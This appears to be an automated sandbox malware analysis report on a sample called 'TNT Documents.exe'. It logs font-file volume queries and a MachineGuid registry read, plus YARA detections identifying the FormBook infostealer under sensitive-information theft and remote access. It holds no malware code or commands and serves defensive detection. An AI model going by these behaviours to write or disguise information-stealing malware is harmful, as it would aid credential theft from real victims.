Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match File source: 7.2.TNT Documents.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.0.TNT Documents.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.0.TNT Documents.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.0.TNT Documents.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.TNT Documents.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.0.TNT Documents.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.0.TNT Documents.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000B.00000000.349024537.000000000F905000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000000.331135577.000000000F905000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.524379332.0000000003A30000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.523498302.0000000003310000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.361357634.00000000014F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.361164513.00000000010D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.524461205.0000000003A60000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.290851774.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.289769088.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.360525017.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.297323666.0000000003389000.00000004.00000001.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected FormBook
Source: Yara match File source: 7.2.TNT Documents.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.0.TNT Documents.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.0.TNT Documents.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.0.TNT Documents.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.TNT Documents.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.0.TNT Documents.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.0.TNT Documents.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000B.00000000.349024537.000000000F905000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000000.331135577.000000000F905000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.524379332.0000000003A30000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.523498302.0000000003310000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.361357634.00000000014F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.361164513.00000000010D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.524461205.0000000003A60000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.290851774.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.289769088.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.360525017.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.297323666.0000000003389000.00000004.00000001.sdmp, type: MEMORY